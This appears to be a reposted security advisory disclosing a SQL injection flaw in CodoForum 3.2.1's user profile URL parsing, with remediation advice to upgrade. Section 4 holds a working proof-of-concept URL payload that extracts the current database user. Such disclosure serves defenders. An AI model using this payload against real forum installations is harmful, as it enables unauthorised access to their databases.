CodoForum 3.2.1 SQL Injection

2016.07.26

Credit: Yakir Wizman

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

1. Advisory Information
========================================
Title           : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage     : https://codoforum.com/
Remotely Exploitable    : Yes
Versions Affected   : Prior to 3.2.1
Tested on       : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability       : SQL Injection (Critical/High)
Date            : 23.07.2016
Author          : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
  
  
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman
   
 
3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.
 
 
4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))
 
 
5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CodoForum 3.2.1 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.